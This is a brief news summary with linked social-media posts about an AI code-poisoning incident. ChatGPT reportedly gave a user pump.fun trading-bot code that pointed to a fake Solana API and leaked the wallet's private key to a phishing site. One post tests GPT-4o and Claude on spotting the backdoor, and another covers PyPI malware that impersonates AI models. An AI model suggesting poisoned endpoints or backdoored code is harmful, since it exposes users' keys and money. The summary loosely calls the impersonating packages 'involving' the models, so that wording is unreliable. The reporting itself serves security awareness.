A user's cryptocurrency wallet was compromised after using code generated by ChatGPT to create a trading bot. The AI model provided code that included a backdoor, sending the user's private key to a phishing website, resulting in a loss of approximately $2,500. This incident highlights the risks of AI code poisoning, where AI models can be manipulated to produce malicious code. The user had asked ChatGPT for assistance in writing a bot for pumpfun, but the AI recommended a fake Solana API website, leading to the security breach. Blockchain security firm Slowmits confirmed the incident, and similar malicious activities involving AI models like ChatGPT and Claude have been found on PyPI, deploying the dangerous information stealer, JarkaStealer.
我把 @r_cky0 分享给我的偷私钥代码(GPT 被投毒后给的带后门代码),再反问给 GPT 及 Claude,如图 1 提示词开头是: What are the risks of these codes 图 2 是 GPT-4o 的结果,确实提示了私钥有风险,但是吧,说了一堆废话,根本没点到要害。 图 3 是 Claude-3.5-Sonnet… https://t.co/kyVqGeeKwE https://t.co/bQ6nAWHtyk
Blockchain security firm warns of AI code poisoning risk after OpenAI’s ChatGPT recommends scam API via @hardeyjumoh https://t.co/Vu1c47RkJv
🛑 Malicious Python packages impersonating AI models like ChatGPT and Claude have been found on PyPI. They’ve been used to deploy a dangerous information stealer, JarkaStealer. Discover the full extent of this attack — https://t.co/YhvgD98wJg #cybersecurity